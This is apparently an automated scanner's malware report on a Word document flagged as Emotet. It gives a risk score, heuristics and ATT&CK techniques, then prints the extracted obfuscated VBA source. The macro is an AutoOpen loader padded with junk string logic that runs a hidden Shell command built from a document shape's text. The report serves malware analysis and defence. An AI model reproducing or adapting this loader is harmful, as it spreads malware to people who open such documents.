MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a critical heuristic for an obfuscated auto-exec VBA loader and is detected by ClamAV as Emotet. The AutoOpen macro is designed to execute obfuscated code that likely downloads and executes a second-stage payload. The presence of legacy WordBasic auto-exec markers further supports the malicious intent.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6872657-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6872657-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3411 bytes |
SHA-256: 0408eddbc3d4dccd167d1064591f4525e1c5563eaed92e4a098d86154ecbcc98 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bwiOniizVBh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
GZRGPjckc = "" + otXAwAiM + OKPqC + ActiveDocument.Name + zwZjG + CQtTi
ORSUlWtfX = iMtHYi & BcTKSYC & "\" & GZRGPjckc
If Dir(ORSUlWtfX) = "" Then
If Dir(Replace(ORSUlWtfX, "IiINp", "ziAHWm")) <> "" Then
ORSUlWtfX = Replace(ORSUlWtfX, "jjKCIKmQ", ".SJiwBh")
End If
End If
ihUvahs = "" + jrBfItO + YbGlVsRbs + ActiveDocument.Name + XjLkUFN + ZMzBAsd
sopMz = ZmvWYrOk & VCtUH & "\" & ihUvahs
If Dir(sopMz) = "" Then
If Dir(Replace(sopMz, "QssfHCJj", "rjXfak")) <> "" Then
sopMz = Replace(sopMz, "PPYcRw", ".vRlUBwX")
End If
End If
HmcYjM = "" + ZbuVZKmqu + WKDnz + ActiveDocument.Name + nQodN + awAQJ
wNViIns = zcllkUBQR & VZbVdVq & "\" & HmcYjM
If Dir(wNViIns) = "" Then
If Dir(Replace(wNViIns, "rRwbobWl", "MjcFZZJ")) <> "" Then
wNViIns = Replace(wNViIns, "nHpDtPl", ".AjYBw")
End If
End If
KwOvo = "" + wlKQZpwtH + wSrctDLrl + ActiveDocument.Name + zWslC + IEqfIDM
VovzXKJYw = wBAMhV & qBlRBGfbf & "\" & KwOvo
If Dir(VovzXKJYw) = "" Then
If Dir(Replace(VovzXKJYw, "KmnfOB", "ZVQRrLk")) <> "" Then
VovzXKJYw = Replace(VovzXKJYw, "bzwKF", ".csZNvjrDb")
End If
End If
MiTcPhizNwJ = "" + DzdHu + QNZahLX + Shapes("mKuUMOR").TextFrame.ContainingRange + RbMITfz + Zouzki
SolnGO = "" + zHwLGpqdi + TwBiCJfw + ActiveDocument.Name + AHYAiX + ilJVc
zcfkwpFja = wHSIXLSHi & PoGNcD & "\" & SolnGO
If Dir(zcfkwpFja) = "" Then
If Dir(Replace(zcfkwpFja, "HIkSz", "tBbWQ")) <> "" Then
zcfkwpFja = Replace(zcfkwpFja, "UlboJJfJ", ".joaHSnA")
End If
End If
bCZwCbS = "" + jZtdY + IGlzGN + ActiveDocument.Name + FwGHiRU + NXnjXPk
hhScujH = jVHAhYBbu & YqToDqcs & "\" & bCZwCbS
If Dir(hhScujH) = "" Then
If Dir(Replace(hhScujH, "VfRclziq", "qKGtJfobF")) <> "" Then
hhScujH = Replace(hhScujH, "NbDXj", ".nWCGuAFX")
End If
End If
Const ioQhnoLktL = vbHide
NDJqst = "" + VbTWkYP + jZjPMXC + ActiveDocument.Name + EtwqvvDC + PcTQsXVM
TlaUKKiOs = lipcA & LdFOZlIU & "\" & NDJqst
If Dir(TlaUKKiOs) = "" Then
If Dir(Replace(TlaUKKiOs, "Vvjjrmf", "LzRmrl")) <> "" Then
TlaUKKiOs = Replace(TlaUKKiOs, "VNtKL", ".ZXQiUvv")
End If
End If
Shell@ MiTcPhizNwJ + KCqCG + BMKkjE, ioQhnoLktL
ziaWlatf = "" + ABFHFKl + LqYZNW + ActiveDocument.Name + izfUz + SWFNGJqF
SZcbEN = LbpwHLuC & mFDtmDkjW & "\" & ziaWlatf
If Dir(SZcbEN) = "" Then
If Dir(Replace(SZcbEN, "GRivYa", "wHHTdFJ")) <> "" Then
SZcbEN = Replace(SZcbEN, "YHJzY", ".JQmihfzuz")
End If
End If
YrOvi = "" + jZiVajPI + TYJQYpl + ActiveDocument.Name + ADFGmS + nDrHXHh
iwWps = rkDUwGj & LBuvYSw & "\" & YrOvi
If Dir(iwWps) = "" Then
If Dir(Replace(iwWps, "cQqPO", "aJaKAMX")) <> "" Then
iwWps = Replace(iwWps, "QnWnlBsAb", ".HChXpHkXl")
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.